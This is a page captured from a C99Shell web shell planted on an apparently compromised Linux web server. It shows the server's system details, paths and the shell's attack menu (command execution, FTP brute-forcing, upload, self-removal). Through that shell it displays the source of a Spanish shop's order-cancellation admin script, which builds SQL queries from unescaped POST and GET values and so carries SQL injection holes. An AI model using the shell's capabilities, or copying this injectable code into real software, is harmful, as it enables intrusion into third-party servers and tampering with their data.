!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache. PHP/5.3.29 

uname -a: Linux tardis23.nocplanet.net 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024
x86_64
 

 

Safe-mode: OFF (not secure)

/home/memoriacel/public_html/2018/panel/   drwxr-xr-x
Free 985.28 GB of 1859.98 GB (52.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pedido-cancelar.php (3.58 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
$pagina_actual
="administrar-productos";
$categoria_actual="productos";
require_once(
"includes/config.php");
require_once(
"includes/funciones.php");

if (isset(
$_POST["id"])){
    
    
extract($_POSTEXTR_SKIP);

  
$nuevo_estado='cancelado';

  
$productos $mysqli->query("
      SELECT p.id, p.nombre, rpc.cantidad, rpc.precio, p.codigo, rpc.codigo_producto
      FROM producto p
      INNER JOIN renglon_pedido_producto rpc ON rpc.id_producto=p.id
      WHERE rpc.id_pedido='"
.$id."'
  "
); 

  while (
$producto mysqli_fetch_assoc($productos)){  
      
$result=$mysqli->query("
      UPDATE precio_producto SET   
      stock=stock+"
.$producto["cantidad"]."
      WHERE codigo='"
.$producto["codigo_producto"]."'
      "
); 
  }
        
    
$result=$mysqli->query("
    UPDATE pedido_carrito SET     
  estado='"
.$nuevo_estado."',
  cancelar_razon='"
.utf8_decode($cancelar_razon)."'
    WHERE id='"
.$id."'
    "
);    
    
header('Location: administrar-pedidos.php?exito=si');
}

if (isset(
$_GET["id"])){
    
$id=cadena_segura($_GET["id"],11);
    
    
$result=$mysqli->query("
    SELECT c.id, c.fecha, c.total, u.email
    FROM pedido_carrito c
    INNER JOIN usuario_carrito u ON u.id=c.id_usuario_carrito
    WHERE c.id='
$id'
    "
);
    
$item mysqli_fetch_assoc($result);
    
    
$productos $mysqli->query("
    SELECT p.id, p.nombre, rpc.cantidad, rpc.precio, p.codigo
    FROM producto p
    INNER JOIN renglon_pedido_producto rpc ON rpc.id_producto=p.id
    WHERE rpc.id_pedido='"
.$item["id"]."'
"
);        
?>
<div class="modal-content">
    <form method="post" action="pedido-cancelar.php">
    <input type="hidden" name="id" value="<?=$id?>">
    <div class="modal-header">
        <button type="button" class="close" data-dismiss="modal">&times;</button>
        <h4 class="modal-title"></h4>
    </div>
    <div class="modal-body">
        <div class="form-group">
            <h4>Orden de compra #<?=$item["id"]?></h4>
            <table border="1" class="table-padding-10">
                <thead>
                  <tr><th>Codigo</th>
                  <th>
                    Producto
                  </th>
                  <th>
                    Cant</th>
                  <th>
                    Precio/u</th>
                  <th>
                    Total
                  </th>
                  </tr>
                </thead>
                <tbody>
                <? while ($producto mysqli_fetch_assoc($productos)){?>
                  <tr>
                    <td>
                      <?=$producto["codigo"]?>
                    </td>
                    <td>
                      <?=utf8_encode($producto["nombre"])?>
                    </td>
                    <td>
                      <?=$producto["cantidad"]?>
                    </td>
                    <td>
                      <?=$producto["precio"]?>
                    </td>
                    <td>
                      <?=$producto["precio"]*$producto["cantidad"]?>
                    </td>
                  </tr>
                <? }?>
                </tbody>
            </table> 
        </div>

        <div class="form-horizontal">

            <div class="form-group">
                <label class="col-sm-3">Razón de cancelación: </label>
                <div class="col-sm-9">
                    <textarea name="cancelar_razon" class="seis_lineas form-control"></textarea>
                </div>

            </div>

        </div>             
        
    </div>
    <div class="modal-footer">
        <a href="#" class="btn btn-white" data-dismiss="modal">Cerrar</a>
        <input type="submit" class="btn btn-primary" value="Finalizar">
    </div>
    </form>
</div><!-- /.modal-content -->
<? }?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0062 ]--